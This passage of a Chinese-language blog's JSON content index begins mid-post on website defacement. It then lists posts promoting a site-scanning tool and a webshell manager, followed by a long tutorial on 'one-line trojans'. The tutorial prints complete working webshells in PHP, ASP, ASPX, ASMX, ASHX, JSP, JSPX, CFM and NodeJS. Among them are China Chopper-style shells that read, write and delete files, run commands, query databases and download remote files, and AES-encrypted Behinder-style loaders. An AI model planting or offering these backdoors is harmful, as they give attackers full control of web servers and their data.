在十多年前的中國,當時對網路犯罪的打撃沒有很重,他們自己開發的CMS又有很多漏洞,很容易就會被Getshell,做成以前很長的一段時間都有網站不斷地被掛黑頁,甚至還會在黑頁上寫上自己的QQ號碼。 在國際上比較有名的事件 : Iranian Cyber Army 掛黑頁從技術上來說,制作黑頁並不難,只要會寫HTML就可以了,難的時要怎麼樣掛黑頁,目前來說掛黑頁的方式主要有兩種 Getshell : 用Webshell直接修改 index.html 的HTML, 在無法getshell的情況下有的會直接在後端改圖片 DNS修改 : 把目標DNS改為自己的伺服器IP, 例如Iranian Cyber Army用的就是這種,還有美國政府也是,附圖如下 US","categories":[{"name":"BlackHat","slug":"BlackHat","permalink":"http://example.com/categories/BlackHat/"}],"tags":[{"name":"code","slug":"code","permalink":"http://example.com/tags/code/"},{"name":"html","slug":"html","permalink":"http://example.com/tags/html/"},{"name":"blackhat","slug":"blackhat","permalink":"http://example.com/tags/blackhat/"},{"name":"deface page","slug":"deface-page","permalink":"http://example.com/tags/deface-page/"}],"keywords":[{"name":"BlackHat","slug":"BlackHat","permalink":"http://example.com/categories/BlackHat/"}]},{"title":"【Tool】SiteHunter","slug":"【Tool】SiteHunter","date":"2023-06-05T17:33:28.000Z","updated":"2023-06-12T03:29:32.291Z","comments":true,"path":"2023/06/06/【Tool】SiteHunter/","link":"","permalink":"http://example.com/2023/06/06/%E3%80%90Tool%E3%80%91SiteHunter/","excerpt":"","text":"簡介SiteHunter是一個用C#編寫的網站掃瞄工具,功能如下 : C段掃瞄 目錄掃瞄 子域名爆破 Url Collector GitHubhttps://github.com/malbuffer4pt/SiteHunter Screenshot","categories":[{"name":"Tools","slug":"Tools","permalink":"http://example.com/categories/Tools/"}],"tags":[{"name":"pentest","slug":"pentest","permalink":"http://example.com/tags/pentest/"},{"name":"SiteHunter","slug":"SiteHunter","permalink":"http://example.com/tags/SiteHunter/"},{"name":"Information","slug":"Information","permalink":"http://example.com/tags/Information/"},{"name":"Scan","slug":"Scan","permalink":"http://example.com/tags/Scan/"},{"name":"C段掃瞄","slug":"C段掃瞄","permalink":"http://example.com/tags/C%E6%AE%B5%E6%8E%83%E7%9E%84/"},{"name":"旁注","slug":"旁注","permalink":"http://example.com/tags/%E6%97%81%E6%B3%A8/"},{"name":"子域名","slug":"子域名","permalink":"http://example.com/tags/%E5%AD%90%E5%9F%9F%E5%90%8D/"},{"name":"目錄爆破","slug":"目錄爆破","permalink":"http://example.com/tags/%E7%9B%AE%E9%8C%84%E7%88%86%E7%A0%B4/"},{"name":"工具","slug":"工具","permalink":"http://example.com/tags/%E5%B7%A5%E5%85%B7/"}],"keywords":[{"name":"Tools","slug":"Tools","permalink":"http://example.com/categories/Tools/"}]},{"title":"【Tool】Alien","slug":"【Tool】Alien","date":"2023-06-05T17:33:04.000Z","updated":"2023-06-11T17:04:44.957Z","comments":true,"path":"2023/06/06/【Tool】Alien/","link":"","permalink":"http://example.com/2023/06/06/%E3%80%90Tool%E3%80%91Alien/","excerpt":"","text":"簡介Alien是一個用C#編寫的一句話木馬管理工具,功能如下 : System Information FileManager (可顯示圖片) Virtual Terminal Database Registry Monitor Screenshot 可控伺服器(可使用功能不一致)Windows/Linux/Unix/MacOS Database MySQL : PHP SQL Server : ASP, ASPX, ASMX, ASHX 文檔&下載 ID 主題 Url 1 Alien文檔 https://malbuffer4pt.github.io/Alien 2 Alien Github https://github.com/malbuffer4pt/Alien","categories":[{"name":"Tools","slug":"Tools","permalink":"http://example.com/categories/Tools/"}],"tags":[{"name":"pentest","slug":"pentest","permalink":"http://example.com/tags/pentest/"},{"name":"webshell","slug":"webshell","permalink":"http://example.com/tags/webshell/"},{"name":"工具","slug":"工具","permalink":"http://example.com/tags/%E5%B7%A5%E5%85%B7/"},{"name":"backdoor","slug":"backdoor","permalink":"http://example.com/tags/backdoor/"},{"name":"Alien","slug":"Alien","permalink":"http://example.com/tags/Alien/"}],"keywords":[{"name":"Tools","slug":"Tools","permalink":"http://example.com/categories/Tools/"}]},{"title":"【Tech】一句話木馬","slug":"【Tech】一句話木馬","date":"2023-06-05T17:04:54.000Z","updated":"2023-06-12T04:58:26.397Z","comments":true,"path":"2023/06/06/【Tech】一句話木馬/","link":"","permalink":"http://example.com/2023/06/06/%E3%80%90Tech%E3%80%91%E4%B8%80%E5%8F%A5%E8%A9%B1%E6%9C%A8%E9%A6%AC/","excerpt":"","text":"甚麼是WebShellWebShell是在滲透測試和入侵時都會用到的工具,是一種後門,需要注意的時WebShell和網頁木馬不一樣,網頁木馬是掛在正常網頁上的木馬程式,當使用者瀏覽網頁時就會下載或執行木馬。WebShell是用來控制一整個網頁伺服器的工具。WebShell有以下三種 :- 大馬 : 檔案大,30~70KB以上,加密後會超過100KB。- 小馬 : 檔案小,一般在10KB以下 - 指令執行木馬 : 只能簡單地執行的Shell Command. - 一句話木馬 : 功能可超越大馬,容易隱藏和改造。 一句話木馬在現今的入侵和滲透用的webshell基本上用的都是一句話木馬,大馬的好處是所有執行的Payload都是在localhost上進行,不使用HTTP POST,可以不考慮WAF,但因為檔案太大很容易會被發現,而且不容易寫變種。一句話木馬雖然會因為使用HTTP POST會被WAF檢查,但是很容易寫變種和隱藏,還可以直接寫在正常的檔案內。 一句話木馬客戶端指的是先把對應語言的Payload寫好,再用客戶端發起 POST Request,這樣就會非常方便在大陸以前比較有名的工具叫 中國菜刀,大陸現在比較常用的工具有三個 : 蟻劍 Godzilla 冰蝎 這邊推一下我自己寫的Alienhttps://malbuffer4pt.github.io/Alien 一句話木馬的程式在伺服器沒有裝WAF,Anti-Virus時,只需要用這不到 1KB的程式就可以控制一整台伺服器如下圖 (工具: Alien) 以php為例,PHP一句話木馬為 1<?php @eval($_POST['pass']); ?> $_POST[‘pass’] : 取得HTTP POST參數為pass的Data@eval($str); : 把 $str 以PHP Code執行 , @ 代表如果 $str == null時就不顯示結果(這樣就增加了隱密性。)所以 @eval($_POST[‘pass’]); 就可以把HTTP POST的內容執行, 如 : 1pass=phpinfo(); 就可執行phphinfo(); ASP : 1<% execute(request("pass")) %> ASPX : 12<%@ Page Language="Jscript"%><%eval(Request.Item["pass"])%> 關於ASMX, ASHX, CFM, JSP, JSPX和NodeJS木馬它們的特點都是沒有「好用」(對攻撃者而言)的eval()函數,或者使用上會比較麻煩…ASMX和ASHX是我在Freebuf上找到的,作者是Ivan,這也有寫進Alien內。而CFM是一個很老的東西了… ASMX123456789101112131415161718<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import System.IO;import System.Web.Servicesimport System.Web.Script.Servicespublic class ScriptMethodSpy extends WebService{ WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void { var I = HttpContext.Current; var Request = I.Request; var Response = I.Response; var Server = I.Server; Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>"); eval(Ivan); }} ASHX12345678910111213<%@ WebHandler Language="JScript"class=" HandlerSpy "%>import System;import System.Web;import System.IO;public class HandlerSpy implements IHttpHandler{ function IHttpHandler.ProcessRequest(context : HttpContext){ context.Response.Write("<H1>Just for fun, Do not abuse it!Written by <ahref='https://github.com/Ivan1ee'>Ivan1ee</a></H1> "); eval(context.Request["Ivan"]); } function get IHttpHandler.IsReusable() : Boolean{ return false; }} JSPJSP目前主要有兩種,菜刀形和冰蝎形菜刀形 : 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="sky";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("\\r\\n");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\\t"+sT+"\\t"+l[i].length()+"\\t"+sQ+"\\n");}else{sF+=l[i].getName()+"\\t"+sT+"\\t"+l[i].length()+"\\t"+sQ+"\\n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\\r\\n");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\\t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")+"\\t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\\r\\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\\t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\\t|\\t");}sb.append("\\r\\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\\t|\\t");}sb.append("\\r\\n");}r.close();}catch(Exception e){sb.append("Result\\t|\\t\\r\\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\\t|\\t\\r\\n");}catch(Exception ee){sb.append(ee.toString()+"\\t|\\t\\r\\n");}}m.close();c.close();}%><%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\\r\\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%> 菜刀形就是把所有功能全部寫進一個JSP檔,然後在HTTP POST的時候就會以A, B, C, …, M 執行不同Payload,然面再接上一些參數。 下面是冰蝎 : 12345678910<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")) { String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/ session.putValue("u",k); Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec(k.getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);} %> 冰蝎使用的是ClassLoader(),這樣就相當於是一個Eval函數了。 JSPX1<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root> CFM123456789101112131415161718192021222324252627<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.chopper#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B"><CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C"><CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" /><cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) /><cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) /><cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#"><CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D"><CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J"><CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT><CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M"><CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" /></CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH></CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT> 菜刀形,跟上面的JSP一樣。 NodeJS1234567891011121314151617181920212223242526272829303132var http = require('http'), url = require('url'), exec = require('child_process').exec;var querystring = require('querystring');var host = "127.0.0.1", port = "5555", thisServerUrl = "http://" + host + ":" + port;http.createServer(function (req, res) { req.addListener('end', function () { }); //var parsedUrl = url.parse(req.url, true); //var cmd = parsedUrl.query['cmd']; var string = ''; req.addListener('data', function(chunk){ string += chunk; }); var cmd; req.addListener('end', function(){ var strObj = querystring.parse(string); cmd = strObj.pass; res.writeHead(200, {'Content-Type': 'text/plain'}); if (cmd) { try {eval(cmd);} catch(e) {console.log("ERROR://" + e);res.end("ERROR://");} } else { res.end(); } });}).listen(port, host);console.log('Server running at ' + thisServerUrl ); NodeJS的木馬在滲透測試中不見得能用上,因為使用條件跟php, asp, aspx這些比較過於苛刻。","categories":[{"name":"Code","slug":"Code","permalink":"http://example.com/categories/Code/"}],"tags":[{"name":"pentest","slug":"pentest","permalink":"http://example.com/tags/pentest/"},{"name":"webshell","slug":"webshell","permalink":"http://example.com/tags/webshell/"},{"name":"trojan","slug":"trojan","permalink":"http://example.com/tags/trojan/"},{"name":"backdoor","slug":"backdoor","permalink":"http://example.com/tags/backdoor/"},{"name":"code","slug":"code","permalink":"http://example.com/tags/code/"}],"keywords":[{"name":"Code","slug":"Code","permalink":"http://example.com/categories/Code/"}]}]}